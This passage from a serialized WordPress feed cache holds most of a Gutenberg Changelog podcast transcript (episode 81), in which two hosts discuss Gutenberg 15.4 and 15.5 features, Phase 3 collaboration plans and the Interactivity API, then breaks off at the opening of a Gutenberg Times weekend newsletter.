fixed now with the 15.4. And I think the aspect ratio option is only available when you actually enable the link option for the featured image, right?</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, yeah, yeah. That was the problem. And then for the navigation block, there is a major bug fix that when the input, the classic menu using in the menu name, that it&#8217;s also going to be the title for the block menu. So there is a seamless integration there. And people are not getting confused. They did not take my menu that I wanted to, or didn&#8217;t do it when you imported a classic menu. So this is fixed now with the Gutenberg 5.4. What else is in there?&nbsp;</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; I think this pull request in the demonstration, it&#8217;s actually hide the Meta Box at the bottom by default. Previously it shows the Meta Box when you&#8217;re in a certain width, but now it just hidden. So the interface is much more cleaner than ever now.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, Distraction Free. Don&#8217;t get distracted.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yes.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: The Meta Boxes, yes. Yeah.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; It&#8217;s small, but sometimes people can get distracted by that, even though it&#8217;s this small thing at the bottom.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yes. Yeah. But if you have multiple custom fields or something like that, that can be quite long. So it&#8217;s good to hide it. Yes.</p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Documentation</strong></h3>\n\n\n\n<p>And then there are quite a few documentation changes, and I want to mention them. So your listeners, you can go and look them up. They added examples on how programmatically remove the panels in the document sidebar. So if you don&#8217;t want featured image or don&#8217;t want the tags or the categories, now developers can look up how to actually remove those for their plugins, or for their theme, or the bespoke agency theme development.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; And then the next one is for the sticky position documentation. So I think this relates to the new sticky position features site. So this also been added to documentation.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah. And that also fills in with a second one that we…</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Oh, yeah.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Which is, so the theme, JSON Schema now has two places where the sticky option is mentioned, and it didn&#8217;t before, but it&#8217;s now in the controls for the appearance tools. When you set them for true, there&#8217;s also a sticky option there. And then you can also in these further down in the Schema, you can add the sticky positions, and minimum height for the styles section as well. So that is now all documented, and you can look up how it works and how it helps you.</p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Gutenberg 15.5</strong></h3>\n\n\n\n<p>And I think that&#8217;s the Changelog for Gutenberg 15.4, and we are now right into the Changelog for the latest Gutenberg 15.5 release that was released Wednesday, April 4th. And was again, the team Ryan Welcher and Justin Tadlock. April 5th, sorry. And it has 143 PRs with 52 contributors and some updates there. So the first enhancement is that the post date now block has now a variation to use the modified date rather than the published date. And it&#8217;s really important when you have a new site, and you want to get the updated post higher into the latest news, then you want to use the modified date. So it bubbles up again. &#8220;Okay, look here. There were changes in that and it&#8217;s still important.&#8221;</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah. And this is also great for end user as well, in my opinion, because this is basically the same block with this variation, with the modified date enabled by default. But for new users, it&#8217;s just much easier to find having a separate post date and post modified date. So if they want to show both in the single Post Template, they can just find these blocks without having to fiddle with the settings. So yeah, it&#8217;s a much more seamless and easier work process, workflow. And then similar to the post that we have &#8220;Time to Read&#8221; block, which I believe was released on 15.3. It was right?</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yes.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; And now we have a plethora of settings like typographic support to the &#8220;Time to Read&#8221; block, and also spacing tool. So after this was introduced in 15.3, with 15.5, now you can customize the typography and the spacing tools.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah. Sorry, go ahead.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; No, I&#8217;m finished.</p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Enhancements</strong></h3>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, no, I used it. So the &#8220;Time to Read&#8221; was actually already available in the outline of the post when you were in the block editor. You could see &#8220;Time to Read.&#8221; Two minutes, 15 minutes, yeah, 25 minutes. Never going to read that. But then immediately as it was available, people were asking, &#8220;Well, can I use that information also on my front end so I can notify or I can show it with my post grid or something like that? How long the Time to Read for that?&#8221; So because readers like that, they found. And it took a while to get it right, to get a new block in and figure out what&#8217;s the best approach. So it now only shows a number and the minutes, and that was the easiest way to make it available through all the languages, because each locale works differently with minutes, three minutes kind of thing in different languages.</p>\n\n\n\n<p>So now you can put them in a row with your wording. So Time to Read, 15 minutes. The &#8220;Time to Read&#8221; is a paragraph, and then you stack it with a row. Group block, in a group block with the &#8220;Time to Read&#8221; block, and then you can have that in your Post Template block. So what did happen was that when I was testing it, I saw immediately that my default font size was different for the paragraph as it was for the Time to Read, but I didn&#8217;t have any controls to change that for the Time to Read. So I filed an issue and said, &#8220;Okay, I need typography control there, please.&#8221; And then I also thought, &#8220;Okay, I need some spacing as well,&#8221; because it was a little lower than the Time to Read. It was really weird. I figured it out for my personal blog, but then also found that it would probably be best to have both controls available to that.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah. And in case everyone wondering, it is actually possible to have Time to Read information previously, but you have to code it to your theme or install a plugin specific for that function. So yeah, it&#8217;s nice to have it in Gutenberg. And hopefully, in the future it&#8217;ll push to the core as well.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, yeah.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; So the next one, oh yeah, the sticky position. I think this feature didn&#8217;t have chance to see the light of day, because when the feature is added, it&#8217;s now reverted back. But essentially, there was a pull request to enable Template Part blocks to be sticky, which is perfectly logical. Because if you have a header, you want to have a sticky header, that means you have to make the Template Part for the header sticky. So there&#8217;s this pull request that adds that feature, but the way it worked was adding the Template Parts into a group block, which is already have the sticky position support, but that doesn&#8217;t really consistent with how the Template Part works. So we are now referred back to how it was, you cannot make it sticky anymore. But yeah, the idea is there. So hopefully, this will be a good starter to see, to look for a better solution for this one. Because yeah, I think many users will want to have Template Part header to be sticky instead of they have to use a group block on route level.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah. And it&#8217;s quite unintuitive to figure out, &#8220;Okay, if I want to make it sticky, I need to put it in a group block, but it&#8217;s already a Template Part. Can&#8217;t we have that support just for the Template Part?&#8221; But yeah, that adds definitely to the complexity, because the Template Part sometimes doesn&#8217;t have, the sticky doesn&#8217;t know where to stick it, so to speak. When the Template Part is further down the page, then it&#8217;s hard where to stick it to. And yeah, where is it located? Is the Template Part on the sidebar? Then you have a sticky sidebar, but the sticky sidebar behaves totally differently from a sticky header or a sticky footer. So when you read through the PRs, your head might spin because it really shows the discussion between the designers.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; It&#8217;s just the complexity.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: It&#8217;s totally complex. Yeah, just take it from us. It&#8217;s a complex thing.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; I just skip to Rich Tabor feedback about how it doesn&#8217;t really sit with the consistency of the sticky position as well. Because on this PR, you make it sticky, I think to the Ellipsis menu instead of from the block tools. So it will create a different experience.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah. And the same complexity we will enter when you make the experiment available on, so there is a new feature in 15.5 that&#8217;s first take on the grid layout group variation. So we have flex layouts, we have flow layouts, and now the designers and developers try to get it working with the grid layout. And if you want to try it, you need to enable it through the experiments menu item on the Gutenberg plugin menu item, and check that part to test it out. But please do test it. Because if you want it to get out of experiments and then into the Gutenberg plugin by default and then further into WordPress, it needs to be really working well. And all the use cases, people cannot think up about all the use cases that you would use it. So yeah, please test it and give feedback on the PRs. Or create new issues on the Gutenberg repo so the developers have a better feel from what is still missing and how it&#8217;s not working. Yeah.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah. I just test the feature for a few minutes after the launch, because this is also on the launch post. So it&#8217;s quite interesting. And I love it because it was only after this update, I just realized that if you want to create a block, a grid layout with, let&#8217;s say, three columns and three rows, you have to mix it with row blocks or stack blocks, and you just create the whole complex structure. But now with the grid layout, it can just go straight out from the box with the way you want. You can have four columns, you can have six rows, maybe. And yeah, it&#8217;s nice to have this variation. I already tested, even though just few minutes, but I already see possibilities to use this layout for my website, my portfolio website.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Well, it&#8217;s great when those new features actually trigger some creativity on &#8220;Well, how can I use it? Yeah. Can I push it to the limits?&#8221; And that&#8217;s what it&#8217;s all for. Yeah.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; And the great thing is it&#8217;s not something that I have in mind. So previously, okay, row blocks, type blocks, columns blocks, that works, but now you have a grid. &#8220;Oh my God, I can have that all in one now.&#8221;</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: And that was quite a few themes developers or theme builders were actually missing that, because grids came in to the CSS part, I think it was in &#8217;16 or 2017, and it&#8217;s been a while that other web developers were able to use it in different settings. But WordPress didn&#8217;t have. There was a plugin or there is a plugin where Automattic created some grid layouts. But now that this is in core, I think we can push it really further into the internet, so to speak. There&#8217;s another item that now you can actually style the caption element, also via the UI controls for color and topography. That&#8217;s the caption for the image…</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Image block.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Image block, yeah, and Video block and Table block and all that. So now we have that, but it seems to have also the UI for you were able to do this via the theme JSON, but now you can do it without using the code for it.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah. You can access it through the global style panels for typography, there will be a new caption options, and the color as well.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; So yeah, the next one, we have the patterns to the template start modal. So when you add new templates now instead of having a fallback default templates, you can have this options to pick a pattern to start with. So yeah, this is also interesting, because in my opinion, this is a perfect middle ground. I remember when the Site Editor came in 5.9, when you add a new template, you start with blank canvas, which is quite daunting, to be honest. And then it was fixed in the feature of this 6.2, 6.0, I can&#8217;t remember that one. But basically, now you can choose it with the black templates and a default fallback template, which is great. But the problem is if you have different ideas with the default templates, you basically have to modify the existing template. You can remove some blocks, and you have to add more blocks. But now with the increasing number of patterns and increasing number of the pattern adoption by the theme developers, it&#8217;s nice to have just simply options to add patterns for the template and choose whatever suits your needs.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, definitely. Yeah, the blank page is not good for anybody, not for writers and not for style, for theme builders. So what&#8217;s next?</p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Bug Fixes</strong></h3>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; It&#8217;s quite a lot showing the featured images placeholders. Again, this is something I didn&#8217;t realize at first. Is it Blockfish? Oh, no, it&#8217;s block library. Yeah. It&#8217;s something that I didn&#8217;t realize previously that sometimes the featured image doesn&#8217;t show on the Query Loop block when there&#8217;s no featured set for the certain post. But I think now when you&#8217;re in the Site Editor and some posts may have a featured image and some don&#8217;t, the post with featured image will show the featured image on the Query Loop. And the post that doesn&#8217;t have any featured image will have this gray placeholder so you know that the featured image will be there.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah. Or say, &#8220;Oh,&#8221; and if I want that design, it alerts you to not every post can help you with that design because there is no featured image. So it gets a little bit skewed there, where the headline comes up on the top of the image to the next post. Yeah, so it really helps with what you see is what you get kind of approach. Yeah. Yeah, there was quite a daunting bug there. And then the one other bug fix was that the Selecta&#8217;s API, the hook for the global style variation and Duotone has been fixed, and it&#8217;s now behaving consistently throughout the site. There&#8217;s a whole list of PRs that are with that. Not all of them are actually placed in, but this is definitely a very major fix to revamp the code consistency and code quality for it.</p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>What’s in Active Development or Discussed</strong></h3>\n\n\n\n<p>All right. And this was Gutenberg 5.5. I&#8217;m glad that they were a little smaller as plug-in releases, because first, we got two and then, but we also have a lot to talk about what&#8217;s in active development and what&#8217;s discussed. And I prefixed that next section for the section is, we will include three and a half topics to talk about. First we talk about a little bit about Matias Ventura&#8217;s post on the next phase of the Gutenberg project, Phase 3. And there&#8217;s also work being done on making content and template editing less confusing, and then a proposal on the interactivity API by core contributors. And the half-topic is the design shares by Joen Asmussion from the WordPress design team showed what they are working on. Yeah.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Let&#8217;s start with Phase 3. Personally for me, this is the most excitingness of the year, probably, ever since Matt mentioned it on the State of the Word, that this year we are moving to Phase 3 with real-time collaboration. Personally, I believe if the Phase 3 is what I have in mind, and officially just like what Matias posted on his blog post. This is my personal take, but I really think, I believe that it will be a game changer in the content industry. Because right now, we rely on other tools like Google Docs to collaborate and create the draft for the content and then push it on the WordPress, which, it&#8217;s now better with the Block Editor, but still, you have to move the draft, you still have to clean the code, you still have to move the image with the alt tags. So if the Phase 3 finally mature, this can significantly improve the workflow and the pace of the content industry. So yeah, I really hope the Phase 3 gets underway as soon as possible. And let&#8217;s see how the development then. Definitely can&#8217;t wait for that.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, I&#8217;m totally with you. The other, I think the whole web development and web content creators of the last 25 years is actually waiting for this, that two people at the same time or four people at the same time can access a post and edit it. And not the last person who&#8217;s clicks saves wins. So yes, I think that, and bringing that to a web editor is certainly cutting down on the workflow of a lot of people that had to collaborate on Google Docs to get input from other people, to get approval from other people. So that definitely is that real-time collaboration part that Matias Ventura was talking about in his post. What he also sees is that there are asynchronous collaboration. That if Leo in Indonesia is writing a post, and I&#8217;m in America and that&#8217;s 12 hours apart, I want to comment on it, and it&#8217;s really hard right now to do this because there is no revision comments.</p>\n\n\n\n<p>There is no comments at all unless you have a plugin. There were always a few things already, a plugin there. So PublishPress is one, and then Edit Flow that took care of some of that, but you weren&#8217;t able to customize it to your own liking. And then he also talks about the published flows where you have publishing checklists. So is the image rate in the aspect ratio? Do we have an excerpt? Do we have all the categories and tags, and do we have a different image for the header section and for the footer section? Or when different contacts can have different publish flows. So that is definitely going to be a little bit more complicated to make it extensible. And then also the post revisions interface, it&#8217;s really hard right now to see what really changed when you have a long post from one revisions to the next.</p>\n\n\n\n<p>And this Phase 3 is aiming to make it understand blocks, and then also help you with theme switching as well as applying some other styles. And also have revisions that are scheduled. We have on the documentation team, yeah, Leo, you probably know this better than I do, but if you want to prepare for a release, you need to wait till the release is out, so you can publish it, publish the new version of your documents. But not everybody has time to wait for the release and be there in the middle of a night, and hit the publish button or the save button. You definitely want to schedule that. And yeah, we use a plugin for that, but having that in core would be definitely, we are not the only ones who have that trouble. Yeah, yeah.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah, definitely.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; But with the post revision interface, I think that&#8217;s the main, when talking about collaboration, people might think about real time and asynchronous collaboration. But post revisions are as important as the other ones. Because when you collaborate, especially with bigger themes, you really want to see not only what part has been changed, but who made the change to keep the accountability and content to be as good as possible. And to make sure there&#8217;s no mistake in the process. So yeah, and I think, I&#8217;m not sure, did Matias actually talk about this, but with the collaboration is now on WordPress, there must be some thinking to grant more access to collaborators, maybe from links and maybe how to control the user&#8217;s permissions. So I believe that&#8217;s something to tackle as well on the first three.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah, it&#8217;s definitely will, especially the post revision interface. And although it will need different user roles for different things to do, and I know that bigger publishing houses, they have that really huge requirement that they need to have people access the images but not the text kind of thing or vice versa. And yeah, there&#8217;s definitely a part of the development will be about user roles and user capabilities that come with the publishing flow, for sure. There&#8217;s also the admin design. There was a separate post by Matias back in January, I think, that was thinking about through the WordPress admin experience. And that will now be part of the collaboration phase, where certain pieces of the admin definitely would need a revamp, like how we organize posts. What&#8217;s in the post you need for the collaboration you need, yeah, when was it revisioned?</p>\n\n\n\n<p>Does that need to be in the list view of things? And all that kind of thing. And then also have a library. Expansion, that means spaces where you can manage your patterns, where you can manage your blocks, your styles and your fonts on the site, or at least for the site admin to be able to do that. Right now, there&#8217;s the two, all four of them that I&#8217;ve just mentioned. And the Matias mentioned in his post where are actually missing, and it&#8217;s felt quite a bit throughout the five years that the Block Editor is there, especially the blocks where you can switch on and switch off blocks in the interface. But then if you have third-party blocks, you don&#8217;t know which of the blocks have you used or which post uses which block. So you can switch it over to a different one when you say, &#8220;Okay, I want to remove the plugin.&#8221; But all of a sudden, some of your content disappears as well.</p>\n\n\n\n<p>So there definitely needs to be a little bit more manageable space there. And then the last item is develop a global search and command component where you can say, &#8220;Okay, edit post in a search box,&#8221; and then it opens up the &#8220;Edit post&#8221; admin screen. So you don&#8217;t have to click through all the different levels of things. That&#8217;s the idea behind it. So I&#8217;m not sure if we do it really justice, going through those different sections of the collaboration post by Matias. Give it a read. It&#8217;s definitely is a little bit more expanded at what we are doing here. And see, and especially what Matias Ventura is asking and the whole core contributors are asking. So if there&#8217;s something that you are doing on your website and you want it in one part of the collaboration, because it fits in that scope, but it wasn&#8217;t yet mentioned, comment on the post, describe your flow, and see if that&#8217;s something that could be in core.</p>\n\n\n\n<p>Nothing is, of course, prominent at this stage because I haven&#8217;t started working on it yet. So in the WP Briefing podcast, Episode 52, Josepha Haden Chomphosy and Hector Prieto also talking about the Phase 3, the workflows, the visioning about it. So it&#8217;s another version of it, and you probably can hear more about it. All right. So I mentioned it before, is also work being done, and we&#8217;ll share the links to the PR and discussions in the show notes.</p>\n\n\n\n<p>Users repeatedly mentioned that they sometimes get confused of what they are actually editing in the Site Editor. And then they see a page and make updates to the content, and then they&#8217;re surprised that page template, actually, that they&#8217;re actually changed the page template. And that the content that they changed or that they added is replicated on all the pages because it was a template. So that&#8217;s quite a surprising thing, and it&#8217;s nowhere really alerted that that might happen. So the developers and designers are really working hard to make it a seamless switch from editing your content to editing a template. And there are two, there&#8217;s one PR that actually caters to that, but then there is a bigger effort to optimize also the content-centric editing experience in the site editor. So I&#8217;ll share those in the side notes. Show notes, side notes, show notes. Yeah.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; It&#8217;s definitely a nice addition to the Site Editor. I remember when the browse mode first mentioned in past updates, I believe, this is actually what I had in mind. Users can browse their websites, can open pages and blog post to the Site Editors. And when they want to edit the content, they can just switch from editing the templates and just editing the page or post they&#8217;re browsing in. And I think with the new navigation UI in the site bar or the dark side of the Site Editor, it&#8217;s like that already. We can see the menu items in there and just click on it, and you can see the page. And if you click it, you can edit the page on the Site Editor. So yeah, it&#8217;s already in the good direction now. So it&#8217;s only the matter of expanding it to be more integrated between the Site Editors and put editor, and the post and page editor.</p>\n\n\n\n<p>To be honest, when the first Site Editor came out in 5.9, this is also my first issue, figuring out what is the new Site Editor? And I just click it. &#8220;Okay, this is the template, so how do I edit the post or page? Oh, I still have to go to the old post and page editor.&#8221; Because in my mind, it was a page builder or website builder, but it&#8217;s not right. So it took me a while to understand what it is. And now we are working to integrate the Site Editor and the content editor better. So in the future, we might have a better experience with Block Editor and seamless content editing.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah. And for a newer WordPress user, the difference between the page and the template for the page, that&#8217;s a certain cognitive hurdle there. An abstraction level that not everybody who wants to get their work done wants to deal with. So it&#8217;s definitely something that needs to be handled, but it&#8217;s also sometimes really hard to make that intuitive. And if the context is not known with a switch, so it&#8217;s going to be a training. Sometimes we always think that web editing should be something like using a car, without forgetting that we went to traffic school before we actually learned driving. And we don&#8217;t want have traffic school for the web there. So we need to make a compromise there.</p>\n\n\n\n<p>I also wanted to point the more the developers amongst our listeners to the proposal for an interactivity API that a team of contributors has worked almost a year around it to figure out how can this be standardized. There is, of course, available any of the block builders or block developers or third-party blocks or core blocks. There is some interactivity already available, but it&#8217;s not standardized. And standardization also means that developers don&#8217;t have to relearn everything. Users don&#8217;t have to relearn everything every time they have a new plugin. And also, you can share data. So if one plugin knows about the block of another plugin, then new things and better things can happen. So Mario Santos published a proposal for the Interactivity API.</p>\n\n\n\n<p>And for those of us who need a practical application to think through the abstractions there, it&#8217;s all very theoretically, Mario also put in a video demo of a movie database, where in you can browse the site publicly and developers can look at the code of things. But the video shows two use cases for add an interactivity to that movie directory. And navigating the directory is already by search, and that is one of the interactivity API, because it doesn&#8217;t go back to the server and reloads things. That&#8217;s pretty much what it abstracts is that only parts of the data will be replaced on the site, but it will not go back to reload the whole page that you&#8217;re looking at. And then the other one is click on hearts to favorite some of the movies. And it also has a favorite counter on that. So these kind of interactivity, that&#8217;s a simple example that we can all rely on or relate to.</p>\n\n\n\n<p>And then there is the whole proposal itself. As a developer, you learn about directives, you see some code examples, and the FAQ also answers some of the more in-depth questions you might have. The post has already 40 comments. So grab a cup of coffee, put on some nice, slow music and read through it. It&#8217;s almost a book, but it&#8217;s very, very interesting in terms of what can actually happen when we standardize things. And then there is next week, no. Okay, so I don&#8217;t want to count it because I don&#8217;t know when you are listening to it. So two developers from the team who came up with a proposal will be speakers of the Developer Hours on April 17. I don&#8217;t know if you know about Developer Hours, but they had been revitalized from an experiment last year where you can connect with developers on the core team and have questions answered.</p>\n\n\n\n<p>And this time has a little bit of a different format, when there is an introduction to the interactivity API. And they will hold two events to accommodate as many time zones as possible. One is at 8:00 AM UTC. And the other one, that&#8217;s with Mario Santos. And the other one is at 17:00 UTC. That&#8217;s going to be with Michal Czamplinski. And yeah, so that is actually the next generation of block development getting more interactivity into, it&#8217;s called a hydration process, where things come from the server. Yeah, it&#8217;s a connecting PHP with JavaScript and just update the necessary data on the front end upon user interactions. That&#8217;s pretty much the explanation for it. Yeah, so I don&#8217;t know if you have any comments on that, Leo?</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Nope.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Because I&#8217;m more of an end user in this regard.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah. And what you see in the demo is actually quite impressive, because you see the seamless, that there is no time lost between changing different screens. So that&#8217;s really cool.&nbsp;</p>\n\n\n\n<p>So there are two articles in the show notes, one from the Tavern and one the proposal. And then if you as a developer or want to be a developer kind of person, share or join those two developer hours with Michal and Mario. And the last thing, the half about topic for, what&#8217;s in the works is Joen Asmussen&#8217;s Design Share from March 27th on the &#8220;Make WordPress Design,&#8221; make blog. And he shares what&#8217;s happening, with one is that the mercantile store, the swag store gets some social images that are designed. Then the design team also thinks through making the padding and margin controls a little bit more intuitive and see how to provide easily clickable preset sizes and unlink variations, and take a look at it.</p>\n\n\n\n<p>And he connects with the PRs on issues that are on the GitHub repo. They also have a visual idea on how to scale the Block Options menu. That gets really long now to cluster some of them, and then you can access and an arrow with a secondary menu item there. That&#8217;s quite nice. And then he had, the last one is the ideation of the Template Management view where he has a small video to mock up the view toggle patterns to moving between the browsing and the managing context. So that&#8217;s pretty much the topic that we talked before about content-centric Site Editor kind of thing. So they&#8217;re, of course, design, it&#8217;s all visuals. And we are here on a podcast, so it&#8217;s really hard. But we have the link in the show notes for you, so you can browse them at your own leisure. Yeah. All right.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; The block option in particular caught my eye because as you say, the block options get longer and longer over time. So it is quite short. But then we have block locking tools, we have &#8220;Create Template Part&#8221; options. We now have a copy style and paste styles. I mean, if we have a minimized Windows Manager, try to open the options, so you might have to scroll it down just to find the bottom ones. So yeah, it&#8217;s nice to have the new designs to just split it and with the sub-menus. Yeah.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Yeah. You still need the space on the right-hand side when they pop out. So if there are too many options, it&#8217;s not enough room. But yeah, gradual adoption is pretty much the keyword word for that. Yeah. All right. This is the end of the Gutenberg Changelog Episode 81. Thank you so much for listening, people. Leo, thank you so much for being here and talking this through. You did an excellent job. It was wonderful to have the chat with you, and I really enjoyed it, being on the show with you. So you mentioned…</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah. Go ahead. Go ahead.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: You mentioned a few links to your social web. If you can repeat the website where you have your portfolio for the photography, that would be great.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah, the website is <a href=\"https://leoandlens.com/\">Leo and Lens</a>. I will type it down for you later, and maybe you can put it on the show notes.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: There&#8217;s no maybe about it.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Thank you. Yeah. And yeah, lastly, thank you all, listeners, for listening to this episode. Thank you, Birgit, for having me. It&#8217;s such an honor to be in the Gutenberg Changelog podcast with you.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: It was definitely, the pleasure was all mine. And well, I might ask you to maybe come back in the future. Yeah.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Yeah, yeah, just contact me. I&#8217;ll definitely be happy to be in here again and talk about Gutenberg, about WordPress and how it evolves. Yeah, it is a great pleasure for me.</p>\n\n\n\n<p><em>Birgit Pauli-Haack</em>: Thank you. Yeah, and as always, hey listeners, the show notes will be published on GutenbergTimes.com/podcast. This is Episode 81. And if you have questions or suggestions or news you want us to include, send them to <a href=\"mailto:Changelog@Gutenbergtimes.com\">Changelog@Gutenbergtimes.com</a>. That&#8217;s email <a href=\"mailto:Changelog@Gutenbergtimes.com\">Changelog@Gutenbergtimes.com</a>. And thanks again, and I wish you all a good weekend, a good day, a good year, and a good month, so bye. That&#8217;s it for me. Goodbye.</p>\n\n\n\n<p><em>Leonardus Nugraha</em>:&nbsp; Goodbye.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 09 Apr 2023 13:22:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Birgit Pauli-Haack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:107:\"Gutenberg Times: Anniversary, Open Verse, Performance measuring, Interactivity API – Weekend Edition #249\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://gutenbergtimes.com/?p=23782\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:110:\"https://gutenbergtimes.com/anniversary-open-verse-performance-measuring-interactivity-api-weekend-edition-249/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:21724:\"<p>Howdy, </p>\n\n\n\n<p>Greetings from Munich, Germany! It&#8217;s good to be back in my hometown. Let the honeymoon phase of rekindling begin! </p>\n\n\n\n<p>In the WordPress world,  the last two weeks were quite busy. The major release of WordPress 6.2, a preview of Gutenberg&#8217;s Phase Three, a new Gutenberg plugin version, and so much more. </p>\n\n\n\n<p>Enjoy. Wishing you and yours a great weekend and Happy Easter to those who celebrate it. </p>\n\n\n\n<p>Yours, 💕<br /><em>Birgit</em></p>\n\n\n\n<p>PS: Did you know that as part of the 20-year celebrations coming up next month, <strong>Julia Golomb</strong>, published a play list on Spotify of <a href=\"https://wp20.wordpress.net/20-years-of-wordpress-jazz/\"><strong>20 Years of WordPress Jazz</strong></a>? From Miles Davis to Mikhail “Misha” Alperin, this playlist includes one song for each of the 45 jazz artists selected to <a href=\"https://wordpress.org/about/history/\">represent the releases</a>. Have a look at the site <a href=\"https://wp20.wordpress.net\">wp20.WordPress.net</a> of what is in store for the 20-year anniversary coming up next month. </p>\n\n\n\n<a href=\"https://wp20.wordpress.net/\"><img /></a>\n\n\n\n\n<div class=\"wp-block-group has-light-background-background-color has-background is-layout-flow wp-block-group-is-layout-flow\"><div class=\"wp-block-group__inner-container\">\n<p><strong>Table of Contents</strong></p>\n\n\n\n<div class=\"wp-block-sortabrilliant-guidepost\"><ul><li><a href=\"https://gutenbergtimes.com/feed/#0-word-press-release-information\">Developing Gutenberg and WordPress</a></li><li><a href=\"https://gutenbergtimes.com/feed/#0-p\">Plugins, Themes, and Tools for #nocode site builders and owners</a></li><li><a href=\"https://gutenbergtimes.com/feed/#2-word-press-6-0-1-and-6-1-scheduled\">Theme Development for Full Site Editing and Blocks</a></li><li><a href=\"https://gutenbergtimes.com/feed/#3-building-themes-for-fse-and-word-press\">Building Blocks and Tools 